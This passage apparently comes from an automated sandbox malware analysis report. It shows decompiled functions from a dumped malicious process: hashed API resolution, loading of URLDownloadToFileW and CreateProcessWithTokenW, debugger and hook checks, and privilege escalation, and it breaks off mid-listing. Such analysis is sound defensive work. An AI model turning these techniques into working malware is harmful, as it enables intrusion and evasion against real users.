288eb90 25014->25018 25035 288f28e RtlFreeHeap RegCloseKey RegCreateKeyExA 25015->25035 25019 288eb68 25016->25019 25029 288eb89 25016->25029 25030 28884a2 25016->25030 25018->25029 25034 288f18d 20 API calls 25018->25034 25021 288a7af RegCloseKey 25019->25021 25022 288eb78 25021->25022 25023 288a365 3 API calls 25022->25023 25025 288eb7f 25023->25025 25026 288a20e 3 API calls 25025->25026 25027 288eb84 25026->25027 25028 28834cf 5 API calls 25027->25028 25028->25029 25031 28884b5 25030->25031 25032 288dc1d GetFileAttributesW 25031->25032 25033 28884c0 25031->25033 25032->25033 25033->25019 25034->25029 25035->25029 26038 2874e3b 26039 2874e49 26038->26039 26042 2874e5f 26038->26042 26039->26042 26044 2874d81 26039->26044 26041 2874e5b 26041->26042 26043 2865b07 RtlFreeHeap 26041->26043 26043->26042 26045 2874d9b 26044->26045 26047 2874ddc 26045->26047 26048 2865c1d RtlFreeHeap 26045->26048 26047->26041 26048->26047 26088 2880e43 NtClose 26132 287374b RtlFreeHeap CreateThread FindCloseChangeNotification 26089 287e456 6 API calls 26136 286c355 GetFileAttributesW 26091 28765fa RtlFreeHeap RegCreateKeyExA RegCloseKey 26094 287466e RtlFreeHeap 26097 287d07f RtlFreeHeap ObtainUserAgentString getaddrinfo 26140 287a77c 20 API calls 26098 2884876 88 API calls 26141 2873779 RtlFreeHeap RegCloseKey GetTimeZoneInformation

                        Executed Functions

                        Function 028664BF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 101libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 45%
                        			E028664BF(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _v32;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t35;

				_t55 = __ecx;
				_v32 = __ecx;
				_t28 =  *0x2899648; // 0x77090000
				_v12 = _t28;
				_t29 =  *0x2899670; // 0x76670000
				_v8 = _t29;
				_t30 =  *0x28996e8; // 0x762b0000
				_v16 = _t30;
				_t31 =  *0x2899710; // 0x76170000
				_v24 = _t31;
				if(_v12 != 0) {
					 *0x289f55c = E02884E36(_v12, __ecx, "ntdll.dll", 0x583d0800, 0);
					 *0x289f560 = E02884E36(_v12, _t55, "ntdll.dll", 0x860e09f1, 0);
					 *0x289f568 = E02884E36(_v12, _t55, "ntdll.dll", 0x856309fa, 0);
					 *0x289f56c = E02884E36(_v12, _t55, "ntdll.dll", 0x7bb00997, 0);
					 *0x289f564 =  *0x289f928(_v12, "CsrGetProcessId");
				}
				if(_v8 != 0) {
					 *0x289f54c = E02884E36(_v8, _t55, "kernel32.dll", 0xb30b0b4e, 0);
					 *0x289f550 = E02884E36(_v8, _t55, "kernel32.dll", 0x6bf308a4, 0);
					 *0x289f534 =  *0x289f928(_v8, "InitializeProcThreadAttributeList");
					 *0x289f538 =  *0x289f928(_v8, "UpdateProcThreadAttribute");
				}
				if(_v16 != 0) {
					 *0x289f544 =  *0x289f928(_v16, "ChangeWindowMessageFilter");
				}
				if(_v24 != 0) {
					 *0x289f548 =  *0x289f928(_v24, "CreateProcessWithTokenW");
				}
				_t32 = LoadLibraryA("Urlmon.dll"); // executed
				_v28 = _t32;
				if(_v28 != 0) {
					 *0x289f53c =  *0x289f928(_v28, "ObtainUserAgentString");
					 *0x289f540 =  *0x289f928(_v28, "URLDownloadToFileW");
				}
				_t33 = LoadLibraryA("Netapi32.dll"); // executed
				_v20 = _t33;
				if(_v20 != 0) {
					_t35 = GetProcAddress(_v20, "NetUserGetInfo"); // executed
					 *0x289f554 = _t35;
				}
				return 1;
			}

















                        0x028664bf
                        0x028664c5
                        0x028664c8
                        0x028664cd
                        0x028664d0
                        0x028664d5
                        0x028664d8
                        0x028664dd
                        0x028664e0
                        0x028664e5
                        0x028664ec
                        0x02866502
                        0x0286651b
                        0x02866534
                        0x0286654d
                        0x02866560
                        0x02866560
                        0x02866569
                        0x0286657f
                        0x02866598
                        0x028665ab
                        0x028665be
                        0x028665be
                        0x028665c7
                        0x028665d7
                        0x028665d7
                        0x028665e0
                        0x028665f0
                        0x028665f0
                        0x028665fa
                        0x02866600
                        0x02866607
                        0x02866617
                        0x0286662a
                        0x0286662a
                        0x02866634
                        0x0286663a
                        0x02866641
                        0x0286664b
                        0x02866651
                        0x02866651
                        0x02866659

                        APIs
                        • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 028665FA
                        • LoadLibraryA.KERNEL32(Netapi32.dll), ref: 02866634
                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 0286664B
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$AddressProc
                        • String ID: ChangeWindowMessageFilter$CreateProcessWithTokenW$CsrGetProcessId$InitializeProcThreadAttributeList$NetUserGetInfo$Netapi32.dll$ObtainUserAgentString$URLDownloadToFileW$UpdateProcThreadAttribute$Urlmon.dll$kernel32.dll$ntdll.dll
                        • API String ID: 1469910268-2909713016
                        • Opcode ID: 4d7ca609706e5604d8a048532d6d4613086eca4d0a8594caf50407832d67790a
                        • Instruction ID: 5b2c7c6eaae3a2e126e806c1343a82d76f7095ff538924e8761b0ae883dff65b
                        • Opcode Fuzzy Hash: 4d7ca609706e5604d8a048532d6d4613086eca4d0a8594caf50407832d67790a
                        • Instruction Fuzzy Hash: E741D97DE81205FFEB25EF64ED49BADBBB0EB14711F180825E502E2690E7741A61CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286DB20 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 213nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 29%
                        			E0286DB20(long __eax, void* __ecx, void* __edx, void* __eflags) {
				char _v5;
				void _v12;
				long _v16;
				void* __edi;
				void* _t17;
				long _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t55;
				void* _t60;
				long _t61;
				void* _t69;
				long _t73;
				void* _t85;
				intOrPtr _t87;
				void* _t89;
				void* _t90;
				long _t95;

				_t90 = __edx;
				_t89 = __ecx;
				_t95 = __eax;
				_v5 = 0;
				 *0x289fdb4 =  *0x289f6f8(); // executed
				_t17 = E0286E6A4(__eax); // executed
				if(_t17 != 0) {
					 *0x289f8b0(0x289f310, 0xfa0);
					_v12 = 0;
					_v16 = 0;
					_t21 = NtQueryInformationProcess(0xffffffff, 7,  &_v12, 4,  &_v16); // executed
					__eflags = _t21;
					if(_t21 >= 0) {
						__eflags = _v12;
						if(_v12 != 0) {
							_v5 = 1;
						}
					}
					_t22 =  *0x289f8cc("ntdll.dll");
					 *0x289fdbc = _t22;
					_t23 =  *0x289f8cc("kernel32.dll");
					 *0x289f2e4 = _t23;
					_t24 =  *0x289f8cc("user32.dll");
					 *0x289fdc0 = _t24;
					_t25 =  *0x289f8cc("ws2_32.dll");
					 *0x289fdc4 = _t25;
					 *0x289eecc =  *0x289f8cc("wininet.dll");
					 *0x289f818( *0x289f2e8 + 0x2656); // executed
					E02865446(_t89); // executed
					 *0x289fc54(0, 0x801a, 0, 0,  *0x289f2e8 + 0x37e); // executed
					 *0x289fc54(0, 0x8028, 0, 0,  *0x289f2e8 + 0x176); // executed
					 *0x289fc54(0, 0x8023, 0, 0,  *0x289f2e8 + 0x586); // executed
					 *0x289fc54(0, 0x800d, 0, 0,  *0x289f2e8 + 0x996); // executed
					 *0x289fc54(0, 0x800e, 0, 0,  *0x289f2e8 + 0xb9e); // executed
					 *0x289fc54(0, 0x8027, 0, 0,  *0x289f2e8 + 0x78e); // executed
					 *0x289fc54(0, 0x8026, 0, 0,  *0x289f2e8 + 0xda6); // executed
					 *0x289fc54(0, 0x802a, 0, 0,  *0x289f2e8 + 0xfae); // executed
					_t55 = E0286CEBA(_t89); // executed
					 *0x289f2f0 = _t55;
					 *0x289f2f4 = E0286D035(_t90, __eflags); // executed
					E0286D269(_t89, _t90, __eflags); // executed
					_t60 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
					__eflags = _t60 - 1;
					if(_t60 != 1) {
						 *0x289fdb8 = 0;
					} else {
						_t87 = E0286D0AF(_t89); // executed
						 *0x289fdb8 = _t87;
					}
					_t61 =  *0x289f928( *0x289f2e4, "K32GetMappedFileNameW");
					 *0x289f54c = _t61;
					__eflags = _t61;
					if(_t61 == 0) {
						_t85 =  *0x289f914("Psapi.dll");
						 *0x289f54c =  *0x289f928(_t85, "GetMappedFileNameW");
					}
					E028614DB(_t89, 0x28a0028, 0, 0x18);
					 *0x289f8b0(0x28a0028, 0x3e8); // executed
					E02889F3B(); // executed
					E0287FDBF();
					E028883B6(_t89,  *0x289f2e8 + 0x216e);
					_t69 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
					__eflags = _t69 - 1;
					if(_t69 == 1) {
						E02862313(_t89);
					}
					E028614DB(_t89,  *0x289f2e8 + 0x261a, 0, 0x3c);
					__eflags = _t95;
					if(_t95 == 0) {
						L16:
						_t73 = E02870623(_t89);
						__eflags = _t73;
						if(_t73 == 0) {
							goto L1;
						}
						goto L17;
					} else {
						__eflags =  *_t95 - 0x2672;
						if( *_t95 != 0x2672) {
							goto L16;
						}
						__eflags =  *(_t95 + 0x261e);
						if( *(_t95 + 0x261e) == 0) {
							goto L16;
						}
						E02861493(_t89,  *0x289f2e8 + 0x261a, _t95, 0x3c);
						L17:
						__eflags = _v5 - 1;
						if(_v5 == 1) {
							_v16 =  *0x289f590;
							_push(_t89);
							_push(_t90);
							__eflags =  *[fs:0xc0];
							if( *[fs:0xc0] == 0) {
								__eflags = 0;
							} else {
								 *[fs:0xc0] = _v16;
							}
						}
						return 1;
					}
				}
				L1:
				return 0;
			}























                        0x0286db20
                        0x0286db20
                        0x0286db2b
                        0x0286db2d
                        0x0286db37
                        0x0286db3c
                        0x0286db43
                        0x0286db56
                        0x0286db6a
                        0x0286db6d
                        0x0286db70
                        0x0286db76
                        0x0286db78
                        0x0286db7a
                        0x0286db7d
                        0x0286db7f
                        0x0286db7f
                        0x0286db7d
                        0x0286db88
                        0x0286db93
                        0x0286db98
                        0x0286dba3
                        0x0286dba8
                        0x0286dbb3
                        0x0286dbb8
                        0x0286dbc3
                        0x0286dbce
                        0x0286dbde
                        0x0286dbe4
                        0x0286dbfc
                        0x0286dc15
                        0x0286dc2e
                        0x0286dc47
                        0x0286dc60
                        0x0286dc79
                        0x0286dc92
                        0x0286dcab
                        0x0286dcb1
                        0x0286dcb6
                        0x0286dcc0
                        0x0286dcc5
                        0x0286dcd4
                        0x0286dcd9
                        0x0286dcdb
                        0x0286dce9
                        0x0286dcdd
                        0x0286dcdd
                        0x0286dce2
                        0x0286dce2
                        0x0286dcfa
                        0x0286dd00
                        0x0286dd05
                        0x0286dd07
                        0x0286dd0e
                        0x0286dd20
                        0x0286dd20
                        0x0286dd2e
                        0x0286dd39
                        0x0286dd3f
                        0x0286dd44
                        0x0286dd55
                        0x0286dd64
                        0x0286dd69
                        0x0286dd6b
                        0x0286dd6d
                        0x0286dd6d
                        0x0286dd80
                        0x0286dd85
                        0x0286dd87
                        0x0286ddb6
                        0x0286ddb6
                        0x0286ddbb
                        0x0286ddbd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0286dd89
                        0x0286dd8e
                        0x0286dd91
                        0x00000000
                        0x00000000
                        0x0286dd93
                        0x0286dd99
                        0x00000000
                        0x00000000
                        0x0286ddaf
                        0x0286ddc3
                        0x0286ddc3
                        0x0286ddc7
                        0x0286ddce
                        0x0286ddd1
                        0x0286ddd2
                        0x0286ddd9
                        0x0286dddc
                        0x0286ddf5
                        0x0286ddde
                        0x0286dde1
                        0x0286dde1
                        0x0286dddc
                        0x00000000
                        0x0286ddf8
                        0x0286dd87
                        0x0286db45
                        0x00000000

                        APIs
                          • Part of subcall function 0286E6A4: GetLongPathNameW.KERNEL32(?,?,00000143,00000103,?,00000208,?,00000208,00002672,028A0044), ref: 0286E733
                        • NtQueryInformationProcess.NTDLL(000000FF,00000007,?,00000004,?,?,?,0286E0A9), ref: 0286DB70
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationLongNamePathProcessQuery
                        • String ID: GetMappedFileNameW$K32GetMappedFileNameW$Psapi.dll$kernel32.dll$ntdll.dll$user32.dll$wininet.dll$ws2_32.dll
                        • API String ID: 2350871506-302390598
                        • Opcode ID: bc250c8576a53650dde276481891e110ab775400c2f65c1c1c374f17921be708
                        • Instruction ID: 0b24e44dd983107eee922a4a6880b4890cddd51323e299dbabf0493ab18bb656
                        • Opcode Fuzzy Hash: bc250c8576a53650dde276481891e110ab775400c2f65c1c1c374f17921be708
                        • Instruction Fuzzy Hash: 5171A2BCE80204BFE714AFA8EC4CE7937ADE725309F184815B745D66C1CA7898648F61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286E06B Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 346COMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 768 286e06b-286e0ab call 2867de0 call 286db20 774 286e0b4-286e0c2 768->774 775 286e0ad-286e0af 768->775 774->775 777 286e0c4-286e0c6 774->777 776 286e4f8-286e4fc 775->776 777->775 778 286e0c8-286e0ca 777->778 778->775 779 286e0cc-286e0d0 778->779 779->775 780 286e0d2-286e0d4 779->780 780->775 781 286e0d6-286e0d8 780->781 781->775 782 286e0da-286e0e6 call 286ddff 781->782 785 286e0f0-286e10b call 286e58a call 286d774 782->785 786 286e0e8-286e0eb call 286ddff 782->786 792 286e183-286e194 call 286d4dc 785->792 793 286e10d-286e114 call 28851ef 785->793 786->785 792->775 798 286e19a-286e1b1 call 286d774 792->798 793->775 799 286e116-286e123 call 286dfa0 call 286715c 793->799 804 286e1b3-286e1b7 798->804 805 286e201-286e207 798->805 815 286e1e5-286e1ef 799->815 816 286e129-286e131 call 28671eb 799->816 804->805 807 286e1b9-286e1c1 804->807 808 286e258-286e25f 805->808 809 286e209-286e22e call 28614db call 28643d4 805->809 807->805 813 286e1c3-286e1cf 807->813 811 286e261-286e263 Sleep 808->811 812 286e269-286e275 call 286ddff 808->812 809->808 835 286e230-286e23d 809->835 811->812 826 286e277-286e27a call 286ddff 812->826 827 286e27f-286e289 812->827 828 286e1f4 813->828 829 286e1d1-286e1da 813->829 815->775 816->815 825 286e137-286e13e call 2867de0 816->825 844 286e140 call 28646d8 825->844 845 286e14b-286e155 825->845 826->827 833 286e2b7-286e2bb 827->833 834 286e28b-286e297 call 286d774 827->834 839 286e1fb 828->839 829->839 847 286e1dc-286e1e3 829->847 836 286e2c1-286e2cd call 286d774 833->836 837 286e39a 833->837 834->833 853 286e299-286e2ac call 2863d40 * 2 834->853 835->808 854 286e23f-286e251 835->854 836->837 855 286e2d3-286e2f2 NtQueryInformationProcess 836->855 843 286e39c-286e3a0 837->843 839->805 850 286e3a6-286e3c1 call 286dfda call 2880fb5 843->850 851 286e3a2 843->851 857 286e145-286e149 844->857 865 286e157-286e15d 845->865 866 286e15f-286e163 845->866 876 286e3d2-286e3d9 850->876 877 286e3c3-286e3ca 850->877 851->850 873 286e2b1 853->873 854->808 861 286e2f4-286e2f8 855->861 862 286e30f-286e331 call 2863207 call 286ff36 call 286d78a 855->862 857->845 864 286e165-286e16b 857->864 861->862 868 286e2fa-286e308 861->868 900 286e333-286e335 862->900 901 286e33b-286e342 call 287039f 862->901 864->792 871 286e16d-286e179 864->871 865->866 866->792 866->864 868->862 871->792 873->833 880 286e3dc-286e3e1 876->880 877->876 879 286e3cc-286e3d0 877->879 879->876 879->880 882 286e3e3-286e3e8 880->882 883 286e40b-286e40e 880->883 882->883 887 286e3ea-286e3eb 882->887 885 286e410-286e414 883->885 886 286e421-286e427 883->886 885->886 891 286e416-286e41b call 286e03f 885->891 892 286e431-286e436 call 286fd4d 886->892 893 286e429-286e42f 886->893 889 286e3ed-286e402 call 288383b 887->889 890 286e408 887->890 889->890 890->883 891->886 897 286e43c-286e440 892->897 893->892 893->897 904 286e442-286e44e call 286d774 897->904 905 286e461-286e465 897->905 900->775 900->901 901->775 915 286e348-286e359 call 286d774 901->915 904->905 914 286e450-286e454 904->914 908 286e467-286e46c call 286e03f 905->908 909 286e472-286e480 call 286ddff 905->909 908->909 917 286e485-286e487 909->917 914->905 918 286e456-286e45b call 2877d31 914->918 925 286e372-286e38d call 2863145 call 2866ed1 915->925 926 286e35b-286e362 915->926 917->775 920 286e48d-286e49f call 286d774 917->920 918->905 928 286e4a1-286e4a6 call 28884a2 920->928 929 286e4a8-286e4ac 920->929 942 286e392-286e398 925->942 926->925 930 286e364-286e36c 926->930 933 286e4b3-286e4bd 928->933 929->933 934 286e4ae call 28884de 929->934 930->925 939 286e4bf-286e4c9 call 286e5d6 933->939 940 286e4da-286e4e5 call 286ce65 933->940 934->933 939->940 947 286e4cb-286e4d5 call 28614db 939->947 948 286e4f6 940->948 949 286e4e7-286e4f2 940->949 942->843 947->940 948->776 949->948
                        C-Code - Quality: 74%
                        			E0286E06B(void* __ecx, signed int __edx, void* __eflags, long _a4) {
				char _v9;
				signed int _v10;
				signed int _v11;
				char _v12;
				void _v16;
				char _v20;
				long _v24;
				char _v544;
				void* __ebx;
				void* __edi;
				void* _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				void* _t93;
				signed int _t96;
				signed int _t98;
				void* _t103;
				signed int _t106;
				void* _t108;
				void* _t119;
				unsigned int _t122;
				void* _t127;
				void* _t129;
				signed int _t132;
				signed int _t137;
				void* _t138;
				intOrPtr* _t144;
				intOrPtr _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				signed int _t161;
				signed int _t162;
				void* _t164;
				signed int _t166;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				void* _t177;
				void* _t179;
				signed int _t180;
				intOrPtr _t188;
				signed int _t189;
				signed int _t191;
				intOrPtr _t192;
				intOrPtr _t198;
				signed int _t203;
				void* _t204;

				_t204 = __eflags;
				_t197 = __edx;
				_v10 = 1;
				_v11 = 0;
				_v9 = 0;
				_t203 = 0;
				_v20 = 0;
				 *0x289f968( *0x289ec4a, 0x4d2);
				_v12 = E02867DE0();
				_t84 = E0286DB20(_a4, __ecx, __edx, _t204); // executed
				if(_t84 != 0) {
					_t86 =  *_entry_;
					_t187 = E0288489C;
					__eflags = _t86 - 0xe9;
					if(_t86 == 0xe9) {
						goto L1;
					}
					__eflags = _t86 - 0xeb;
					if(_t86 == 0xeb) {
						goto L1;
					}
					__eflags = _t86 - 0xe8;
					if(_t86 == 0xe8) {
						goto L1;
					}
					_t88 =  *E0288489C;
					__eflags = _t88 - 0xe9;
					if(_t88 == 0xe9) {
						goto L1;
					}
					__eflags = _t88 - 0xeb;
					if(_t88 == 0xeb) {
						goto L1;
					}
					__eflags = _t88 - 0xe8;
					if(_t88 == 0xe8) {
						goto L1;
					} else {
						_t177 = 2; // executed
						E0286DDFF(_t177, E0288489C, _t197); // executed
						__eflags = _v12;
						if(_v12 == 0) {
							__eflags = 1;
							E0286DDFF(1, E0288489C, _t197); // executed
						}
						E0286E58A(_t187);
						_t93 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
						__eflags = _t93 - 1;
						if(_t93 != 1) {
							L21:
							_t96 = E0286D4DC(_t187,  *( *0x289f2e8 + 4) & 0x0000ffff); // executed
							__eflags = _t96;
							if(_t96 == 0) {
								goto L1;
							}
							_t188 =  *0x289f2e8;
							_t98 = E0286D774( *(_t188 + 4) & 0x0000ffff);
							__eflags = _t98;
							if(_t98 != 0) {
								L31:
								_t189 =  *(_t188 + 0xa);
								__eflags = _t189 & 0x00000003;
								if((_t189 & 0x00000003) == 0) {
									E028614DB(_t189,  &_v544, 0, 0x208);
									_t158 = E028643D4( *0x289f2e8 + 0x11b6);
									__eflags = _t158;
									if(_t158 == 0) {
										_t159 =  *0x289f914("comctl32.dll");
										__eflags = _t159;
										if(_t159 != 0) {
											_t189 =  *0x289f2e8 + 0x11b6;
											__eflags = _t189;
											 *0x289f8c8(_t159, _t189, 0x103);
										}
									}
								}
								__eflags =  *0x289f2f4 & 0x00000020;
								if(( *0x289f2f4 & 0x00000020) == 0) {
									Sleep(0x3c); // executed
								}
								_t179 = 4;
								E0286DDFF(_t179, _t189, _t197);
								__eflags = _v12 - 1;
								if(_v12 == 1) {
									__eflags = 1;
									E0286DDFF(1, _t189, _t197);
								}
								_t190 =  *0x289f2e8;
								__eflags =  *(_t190 + 0xa) & 0x00000020;
								if(( *(_t190 + 0xa) & 0x00000020) != 0) {
									_t150 = E0286D774( *(_t190 + 4) & 0x0000ffff);
									__eflags = _t150;
									if(_t150 != 0) {
										E02863D40("SeRestorePrivilege", 1); // executed
										E02863D40("SeBackupPrivilege", 1); // executed
										_t190 =  *0x289f2e8;
									}
								}
								__eflags =  *(_t190 + 0xa) & 0x00000002;
								if(( *(_t190 + 0xa) & 0x00000002) != 0) {
									L54:
									_t180 = 0;
									__eflags = 0;
									goto L55;
								} else {
									_t129 = E0286D774( *(_t190 + 4) & 0x0000ffff);
									__eflags = _t129 - 1;
									if(_t129 != 1) {
										goto L54;
									}
									_t180 = 0;
									_v16 = 0;
									_v24 = 0;
									_t132 = NtQueryInformationProcess(0xffffffff, 7,  &_v16, 4,  &_v24); // executed
									__eflags = _t132;
									if(_t132 >= 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											L028876E3(0x400, _t190, 0xffffffff,  *0x289f57c, 1,  &_v20);
										}
									}
									E02863207( *0x289fdb4);
									E0286FF36(_t180, _t190);
									E0286D78A(_t190);
									_t137 =  *0x289fa6c(_t180) & 0x0000ffff;
									__eflags = _t137 - _t180;
									if(_t137 == _t180) {
										L49:
										_t138 = E0287039F(_t190);
										__eflags = _t138 - 1;
										if(_t138 == 1) {
											goto L1;
										}
										__eflags = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
										if(__eflags != 0) {
											_t144 =  *0x289f564;
											__eflags = _t144 - _t180;
											if(__eflags != 0) {
												_t145 =  *_t144();
												_t190 =  *0x289f2e8;
												 *((intOrPtr*)( *0x289f2e8 + 0x266e)) = _t145;
											}
										}
										 *((intOrPtr*)( *0x289f2e8 + 0x16)) = E02863145(_t190, 0, __eflags,  *0x2898a40, "LSF");
										E02866ED1(__eflags); // executed
										_t190 =  *0x289f2e8;
										L55:
										__eflags =  *(_t190 + 0x12) & 0x00000002;
										if(( *(_t190 + 0x12) & 0x00000002) != 0) {
											_v9 = 1;
										}
										E0286DFDA(_t203, _v11 & 0x000000ff);
										_t198 =  *0x289f2e8;
										_t103 = E02880FB5( *((intOrPtr*)(_t198 + 0x1e)));
										__eflags = _t103 - _t180;
										if(_t103 == _t180) {
											L60:
											_t51 = _t198 + 0xa;
											 *_t51 =  *(_t198 + 0xa) | 0x00000240;
											__eflags =  *_t51;
											_v10 = _t180;
											goto L61;
										} else {
											_t127 = _t103 + 0xa0;
											__eflags = _t127 - _t180;
											if(_t127 == _t180) {
												goto L60;
											}
											__eflags =  *((intOrPtr*)(_t127 + 4)) - 0x20;
											if( *((intOrPtr*)(_t127 + 4)) >= 0x20) {
												L61:
												_t191 =  *(_t198 + 0xe);
												__eflags = _t191 - _t180;
												if(_t191 != _t180) {
													_t122 =  *(_t198 + 0xa);
													__eflags = _t122 & 0x00000001;
													if((_t122 & 0x00000001) != 0) {
														_t191 = _t191 - 1;
														__eflags = _t191;
														if(_t191 == 0) {
															__eflags = _t198 + 0x1646;
															E0288383B(_t198 + 0x1646, _t122 >> 0x00000005 & 1);
															_t198 =  *0x289f2e8;
														}
														 *(_t198 + 0xe) = _t180;
													}
												}
												__eflags = _v9 - _t180;
												if(_v9 == _t180) {
													__eflags =  *(_t198 + 0xa) & 0x00000001;
													if(__eflags == 0) {
														E0286E03F(_t198, __eflags);
														_t198 =  *0x289f2e8;
													}
												}
												__eflags =  *((intOrPtr*)(_t198 + 0x11e)) - _t180;
												if( *((intOrPtr*)(_t198 + 0x11e)) == _t180) {
													L71:
													E0286FD4D(_t191);
													_t198 =  *0x289f2e8;
													goto L72;
												} else {
													__eflags =  *((intOrPtr*)(_t198 + 0x122)) - _t180;
													if( *((intOrPtr*)(_t198 + 0x122)) != _t180) {
														L72:
														__eflags = _v10 - 1;
														if(_v10 == 1) {
															_t119 = E0286D774( *(_t198 + 4) & 0x0000ffff);
															__eflags = _t119 - 1;
															if(_t119 == 1) {
																__eflags =  *(_t198 + 0xa) & 0x00000003;
																if(( *(_t198 + 0xa) & 0x00000003) == 0) {
																	E02877D31(_t191, _t198);
																	_t198 =  *0x289f2e8;
																}
															}
														}
														__eflags = _v9 - 1;
														if(__eflags == 0) {
															E0286E03F(_t198, __eflags);
															_t198 =  *0x289f2e8;
														}
														 *((intOrPtr*)(_t198 + 0x2666)) =  *((intOrPtr*)(_t198 + 0x15a));
														_t106 = E0286DDFF(0, _t191, _t198); // executed
														__eflags = _t106;
														if(_t106 == 0) {
															goto L1;
														} else {
															_t192 =  *0x289f2e8;
															_t108 = E0286D774( *(_t192 + 4) & 0x0000ffff);
															__eflags = _t108 - 1;
															if(_t108 != 1) {
																__eflags =  *(_t192 + 0xa) & 0x00000080;
																if(( *(_t192 + 0xa) & 0x00000080) != 0) {
																	E028884DE();
																}
															} else {
																E028884A2();
															}
															__eflags =  *0x289eea8 - E0288489C;
															if(__eflags == 0) {
																__eflags = E0286E5D6(_a4) - 1;
																if(__eflags == 0) {
																	E028614DB(_t192, _a4, 0, 0x2672);
																}
															}
															E0286CE65(_t192, __eflags);
															__eflags =  *0x289ec6e;
															if( *0x289ec6e == 0) {
																 *( *0x289f2e8 + 4) = 0x80;
															}
															return 1;
														}
													}
													goto L71;
												}
											}
											goto L60;
										}
									} else {
										__eflags = _t137 - 0x40;
										if(_t137 == 0x40) {
											goto L1;
										}
										goto L49;
									}
								}
							}
							__eflags =  *(_t188 + 0xa) & 0x00000002;
							if(( *(_t188 + 0xa) & 0x00000002) == 0) {
								goto L31;
							}
							_t161 =  *(_t188 + 0x162);
							__eflags = _t161;
							if(_t161 == 0) {
								goto L31;
							}
							_t162 =  *0x289f6f0(0x400, 0, _t161);
							__eflags = _t162;
							if(_t162 != 0) {
								 *0x289f824(_t162);
								L30:
								_t188 =  *0x289f2e8;
								goto L31;
							}
							_t164 =  *0x289f884();
							__eflags = _t164 - 5;
							if(_t164 == 5) {
								goto L30;
							}
							L27:
							 *0x289f90c(0x3e8);
							goto L27;
						}
						_t166 = E028851EF(_t187); // executed
						__eflags = _t166;
						if(_t166 == 0) {
							goto L1;
						}
						E0286DFA0();
						_t168 = E0286715C();
						__eflags = _t168 - 1;
						if(_t168 == 1) {
							L28:
							 *0x289f608(0xffffffff, 0);
							goto L1;
						}
						_t170 = E028671EB();
						__eflags = _t170 - 1;
						if(_t170 == 1) {
							goto L28;
						}
						_t171 = E02867DE0();
						__eflags = _t171;
						if(_t171 != 0) {
							L16:
							_t172 =  *0x289f908();
							_t187 = 0;
							__eflags = _t172;
							if(_t172 != 0) {
								_t10 = _t172 % 0x3e8;
								__eflags = _t10;
								_t197 = _t10;
								_t187 = _t172 / 0x3e8;
							}
							_t203 = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								goto L21;
							}
							L19:
							__eflags = _t203 - 0xb4;
							if(_t203 < 0xb4) {
								 *0x289f2f4 =  *0x289f2f4 | 0x00000020;
								__eflags =  *0x289f2f4;
								_v11 = 1;
								 *0x289f90c(0x7d0);
							}
							goto L21;
						}
						_t175 = E028646D8(_t187); // executed
						_t203 = _t175;
						__eflags = _t203;
						if(_t203 != 0) {
							goto L19;
						}
						goto L16;
					}
				}
				L1:
				return 0;
			}





















































                        0x0286e06b
                        0x0286e06b
                        0x0286e084
                        0x0286e088
                        0x0286e08b
                        0x0286e08e
                        0x0286e090
                        0x0286e093
                        0x0286e09e
                        0x0286e0a4
                        0x0286e0ab
                        0x0286e0b9
                        0x0286e0bb
                        0x0286e0c0
                        0x0286e0c2
                        0x00000000
                        0x00000000
                        0x0286e0c4
                        0x0286e0c6
                        0x00000000
                        0x00000000
                        0x0286e0c8
                        0x0286e0ca
                        0x00000000
                        0x00000000
                        0x0286e0cc
                        0x0286e0ce
                        0x0286e0d0
                        0x00000000
                        0x00000000
                        0x0286e0d2
                        0x0286e0d4
                        0x00000000
                        0x00000000
                        0x0286e0d6
                        0x0286e0d8
                        0x00000000
                        0x0286e0da
                        0x0286e0dc
                        0x0286e0dd
                        0x0286e0e2
                        0x0286e0e6
                        0x0286e0ea
                        0x0286e0eb
